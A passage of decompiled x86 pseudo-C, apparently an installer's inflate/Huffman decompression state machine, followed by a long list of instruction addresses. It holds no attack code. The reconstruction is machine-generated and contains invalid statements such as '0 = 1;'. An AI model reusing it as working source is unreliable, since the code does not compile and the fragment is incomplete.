												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3a8;
												if( *0x42e3a8 != 0) {
													L22:
													_t412 =  *0x40a42c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d224; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d220; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d228;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6a8;
													if(_t416 < 0x42d6a8) {
														L15:
														__eflags = _t416 - 0x42d464;
														_t438 = 8;
														if(_t416 > 0x42d464) {
															__eflags = _t416 - 0x42d628;
															if(_t416 >= 0x42d628) {
																__eflags = _t416 - 0x42d688;
																if(_t416 < 0x42d688) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d228, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d228 + _t440;
														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
														 *0x42e3a8 =  *0x42e3a8 + 1;
														__eflags =  *0x42e3a8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                        0x00406945
                                                                        0x00406945
                                                                        0x00406945
                                                                        0x00406945
                                                                        0x00406945
                                                                        0x00406949
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040694f
                                                                        0x0040694f
                                                                        0x00406952
                                                                        0x00406955
                                                                        0x0040695a
                                                                        0x0040695c
                                                                        0x0040695f
                                                                        0x00406962
                                                                        0x00406965
                                                                        0x00406965
                                                                        0x00406968
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040696a
                                                                        0x0040696a
                                                                        0x0040696d
                                                                        0x00406972
                                                                        0x00406974
                                                                        0x00406977
                                                                        0x0040697d
                                                                        0x004066dc
                                                                        0x004066dc
                                                                        0x004066df
                                                                        0x004066e5
                                                                        0x004066eb
                                                                        0x004066f4
                                                                        0x004066fa
                                                                        0x004066fd
                                                                        0x00406704
                                                                        0x00406709
                                                                        0x0040670f
                                                                        0x0040671a
                                                                        0x0040671a
                                                                        0x00406983
                                                                        0x00406983
                                                                        0x0040698d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406993
                                                                        0x00406993
                                                                        0x00406997
                                                                        0x0040699a
                                                                        0x0040699a
                                                                        0x0040699e
                                                                        0x004069a4
                                                                        0x004069a4
                                                                        0x004069a7
                                                                        0x004069aa
                                                                        0x004069b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004069b2
                                                                        0x004069d4
                                                                        0x004069d4
                                                                        0x004069d7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004069b4
                                                                        0x004069b8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004069be
                                                                        0x004069be
                                                                        0x004069c1
                                                                        0x004069c4
                                                                        0x004069c9
                                                                        0x004069cb
                                                                        0x004069ce
                                                                        0x004069d1
                                                                        0x004069d1
                                                                        0x004069d9
                                                                        0x004069d9
                                                                        0x004069df
                                                                        0x004069e2
                                                                        0x004069e5
                                                                        0x004069e5
                                                                        0x004069ec
                                                                        0x004069f0
                                                                        0x004069f4
                                                                        0x004069f7
                                                                        0x004069fa
                                                                        0x00406a00
                                                                        0x00406a05
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406a07
                                                                        0x00406a1b
                                                                        0x00406a1b
                                                                        0x00406a1f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406a09
                                                                        0x00406a0c
                                                                        0x00406a0c
                                                                        0x00406a13
                                                                        0x00406a18
                                                                        0x00406a18
                                                                        0x00406a18
                                                                        0x00406a21
                                                                        0x00406a21
                                                                        0x00406a24
                                                                        0x00406a32
                                                                        0x00406a38
                                                                        0x00406a3d
                                                                        0x00406a43
                                                                        0x00406a49
                                                                        0x00406a4f
                                                                        0x00406a56
                                                                        0x00406a6a
                                                                        0x00406a6a
                                                                        0x00407039
                                                                        0x00407039
                                                                        0x00407039
                                                                        0x0040703e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406676
                                                                        0x00406676
                                                                        0x00000000
                                                                        0x00406c71
                                                                        0x00406c71
                                                                        0x00406c75
                                                                        0x00406c78
                                                                        0x00406c7b
                                                                        0x00406c7e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c84
                                                                        0x00406c84
                                                                        0x00406ca9
                                                                        0x00406ca9
                                                                        0x00406ca9
                                                                        0x00406cab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c89
                                                                        0x00406c89
                                                                        0x00406c8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c93
                                                                        0x00406c93
                                                                        0x00406c96
                                                                        0x00406c99
                                                                        0x00406c9c
                                                                        0x00406c9e
                                                                        0x00406ca0
                                                                        0x00406ca3
                                                                        0x00406ca6
                                                                        0x00406ca6
                                                                        0x00406ca6
                                                                        0x00406cad
                                                                        0x00406cad
                                                                        0x00406cb5
                                                                        0x00406cb8
                                                                        0x00406cbb
                                                                        0x00406cbe
                                                                        0x00406cc2
                                                                        0x00406cc5
                                                                        0x00406cc7
                                                                        0x00406cca
                                                                        0x00406ccc
                                                                        0x00406ce0
                                                                        0x00406ce0
                                                                        0x00406ce3
                                                                        0x00406cfd
                                                                        0x00406cfd
                                                                        0x00406d00
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d06
                                                                        0x00406d06
                                                                        0x00406d09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d0f
                                                                        0x00406d0f
                                                                        0x00000000
                                                                        0x00406d0f
                                                                        0x00406ce5
                                                                        0x00406ce8
                                                                        0x00406cef
                                                                        0x00406cf2
                                                                        0x00000000
                                                                        0x00406cf2
                                                                        0x00406cce
                                                                        0x00406cd2
                                                                        0x00406cd5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d1a
                                                                        0x00406d1a
                                                                        0x00406d3f
                                                                        0x00406d3f
                                                                        0x00406d3f
                                                                        0x00406d41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d1f
                                                                        0x00406d1f
                                                                        0x00406d23
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d2c
                                                                        0x00406d2f
                                                                        0x00406d32
                                                                        0x00406d34
                                                                        0x00406d36
                                                                        0x00406d39
                                                                        0x00406d3c
                                                                        0x00406d3c
                                                                        0x00406d3c
                                                                        0x00406d43
                                                                        0x00406d4b
                                                                        0x00406d4e
                                                                        0x00406d51
                                                                        0x00406d53
                                                                        0x00406d56
                                                                        0x00406d56
                                                                        0x00406d58
                                                                        0x00406d5c
                                                                        0x00406d5f
                                                                        0x00406d62
                                                                        0x00406d65
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d6b
                                                                        0x00406d6b
                                                                        0x00406d90
                                                                        0x00406d90
                                                                        0x00406d90
                                                                        0x00406d92
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d70
                                                                        0x00406d70
                                                                        0x00406d74
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d7a
                                                                        0x00406d7a
                                                                        0x00406d7d
                                                                        0x00406d80
                                                                        0x00406d83
                                                                        0x00406d85
                                                                        0x00406d87
                                                                        0x00406d8a
                                                                        0x00406d8d
                                                                        0x00406d8d
                                                                        0x00406d8d
                                                                        0x00406d94
                                                                        0x00406d94
                                                                        0x00406d9c
                                                                        0x00406d9f
                                                                        0x00406da2
                                                                        0x00406da5
                                                                        0x00406da9
                                                                        0x00406dac
                                                                        0x00406dae
                                                                        0x00406db1
                                                                        0x00406db4
                                                                        0x00406dce
                                                                        0x00406dce
                                                                        0x00406dd1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406dd7
                                                                        0x00406dd7
                                                                        0x00406dda
                                                                        0x00406de1
                                                                        0x00000000
                                                                        0x00406de1
                                                                        0x00406db6
                                                                        0x00406db9
                                                                        0x00406dc0
                                                                        0x00406dc3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406de9
                                                                        0x00406de9
                                                                        0x00406e0e
                                                                        0x00406e0e
                                                                        0x00406e0e
                                                                        0x00406e10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406dee
                                                                        0x00406dee
                                                                        0x00406df2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406df8
                                                                        0x00406df8
                                                                        0x00406dfb
                                                                        0x00406dfe
                                                                        0x00406e01
                                                                        0x00406e03
                                                                        0x00406e05
                                                                        0x00406e08
                                                                        0x00406e0b
                                                                        0x00406e0b
                                                                        0x00406e0b
                                                                        0x00406e12
                                                                        0x00406e1a
                                                                        0x00406e1d
                                                                        0x00406e20
                                                                        0x00406e22
                                                                        0x00406e25
                                                                        0x00406e25
                                                                        0x00406e27
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e2d
                                                                        0x00406e2d
                                                                        0x00406e30
                                                                        0x00406e35
                                                                        0x00406e37
                                                                        0x00406e3d
                                                                        0x00406e3f
                                                                        0x00406e54
                                                                        0x00406e56
                                                                        0x00406e56
                                                                        0x00406e41
                                                                        0x00406e47
                                                                        0x00406e49
                                                                        0x00406e4b
                                                                        0x00406e4b
                                                                        0x00406e58
                                                                        0x00406e5c
                                                                        0x00406e5f
                                                                        0x00406e65
                                                                        0x00406e65
                                                                        0x00406e68
                                                                        0x00406e68
                                                                        0x00406e68
                                                                        0x00406e6a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e70
                                                                        0x00406e70
                                                                        0x00406e76
                                                                        0x00406e78
                                                                        0x00406e9d
                                                                        0x00406ea0
                                                                        0x00406ea6
                                                                        0x00406eab
                                                                        0x00406eb1
                                                                        0x00406eb7
                                                                        0x00406eb9
                                                                        0x00406ebc
                                                                        0x00406ec5
                                                                        0x00406ecb
                                                                        0x00406ecb
                                                                        0x00406ebe
                                                                        0x00406ec0
                                                                        0x00406ec2
                                                                        0x00406ec2
                                                                        0x00406ecd
                                                                        0x00406ed3
                                                                        0x00406ed5
                                                                        0x00406ed8
                                                                        0x00406eda
                                                                        0x00406ee0
                                                                        0x00406ee2
                                                                        0x00406ee4
                                                                        0x00406ee6
                                                                        0x00406ee8
                                                                        0x00406eeb
                                                                        0x00406ef4
                                                                        0x00406ef7
                                                                        0x00406ef7
                                                                        0x00406eed
                                                                        0x00406eed
                                                                        0x00406ef0
                                                                        0x00406ef0
                                                                        0x00406eeb
                                                                        0x00406ee2
                                                                        0x00406ef9
                                                                        0x00406efb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406efb
                                                                        0x00406e7a
                                                                        0x00406e7a
                                                                        0x00406e80
                                                                        0x00406e86
                                                                        0x00406e88
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e8a
                                                                        0x00406e8a
                                                                        0x00406e8c
                                                                        0x00406e8e
                                                                        0x00406e97
                                                                        0x00406e97
                                                                        0x00406e90
                                                                        0x00406e90
                                                                        0x00406e93
                                                                        0x00406e93
                                                                        0x00406e99
                                                                        0x00406e9b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f01
                                                                        0x00406f01
                                                                        0x00406f06
                                                                        0x00406f08
                                                                        0x00406f09
                                                                        0x00406f0a
                                                                        0x00406f0b
                                                                        0x00406f11
                                                                        0x00406f14
                                                                        0x00406f17
                                                                        0x00406f1a
                                                                        0x00406f1c
                                                                        0x00406f22
                                                                        0x00406f22
                                                                        0x00406f25
                                                                        0x00406f25
                                                                        0x00406f25
                                                                        0x00406f25
                                                                        0x00406f2e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f33
                                                                        0x00406f33
                                                                        0x00406f36
                                                                        0x00406f39
                                                                        0x00406f3b
                                                                        0x00406fd2
                                                                        0x00406fd2
                                                                        0x00406fd5
                                                                        0x00406fd7
                                                                        0x00406fd8
                                                                        0x00406fd9
                                                                        0x00406fdc
                                                                        0x00000000
                                                                        0x00406fdc
                                                                        0x00406f41
                                                                        0x00406f41
                                                                        0x00406f47
                                                                        0x00406f49
                                                                        0x00406f6e
                                                                        0x00406f71
                                                                        0x00406f77
                                                                        0x00406f7c
                                                                        0x00406f82
                                                                        0x00406f88
                                                                        0x00406f8a
                                                                        0x00406f8d
                                                                        0x00406f96
                                                                        0x00406f9c
                                                                        0x00406f9c
                                                                        0x00406f8f
                                                                        0x00406f91
                                                                        0x00406f93
                                                                        0x00406f93
                                                                        0x00406f9e
                                                                        0x00406fa4
                                                                        0x00406fa6
                                                                        0x00406fa9
                                                                        0x00406fab
                                                                        0x00406fb1
                                                                        0x00406fb3
                                                                        0x00406fb5
                                                                        0x00406fb7
                                                                        0x00406fb9
                                                                        0x00406fbc
                                                                        0x00406fc5
                                                                        0x00406fc8
                                                                        0x00406fc8
                                                                        0x00406fbe
                                                                        0x00406fbe
                                                                        0x00406fc1
                                                                        0x00406fc1
                                                                        0x00406fbc
                                                                        0x00406fb3
                                                                        0x00406fca
                                                                        0x00406fcc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406fcc
                                                                        0x00406f4b
                                                                        0x00406f4b
                                                                        0x00406f51
                                                                        0x00406f57
                                                                        0x00406f59
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f5b
                                                                        0x00406f5b
                                                                        0x00406f5d
                                                                        0x00406f5f
                                                                        0x00406f66
                                                                        0x00406f66
                                                                        0x00406f68
                                                                        0x00406f61
                                                                        0x00406f61
                                                                        0x00406f63
                                                                        0x00406f63
                                                                        0x00406f6a
                                                                        0x00406f6c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406fe4
                                                                        0x00406fe4
                                                                        0x00406fe7
                                                                        0x00406fe9
                                                                        0x00406fec
                                                                        0x00406fef
                                                                        0x00406fef
                                                                        0x00406fef
                                                                        0x00406fef
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040669d
                                                                        0x00406681
                                                                        0x00000000
                                                                        0x00406687
                                                                        0x0040668a
                                                                        0x00406694
                                                                        0x00406697
                                                                        0x0040669a
                                                                        0x00000000
                                                                        0x0040669a
                                                                        0x00406681
                                                                        0x004066a5
                                                                        0x004066a8
                                                                        0x004066ac
                                                                        0x004066b6
                                                                        0x004066c0
                                                                        0x004066c3
                                                                        0x004066c9
                                                                        0x004067fd
                                                                        0x004067ff
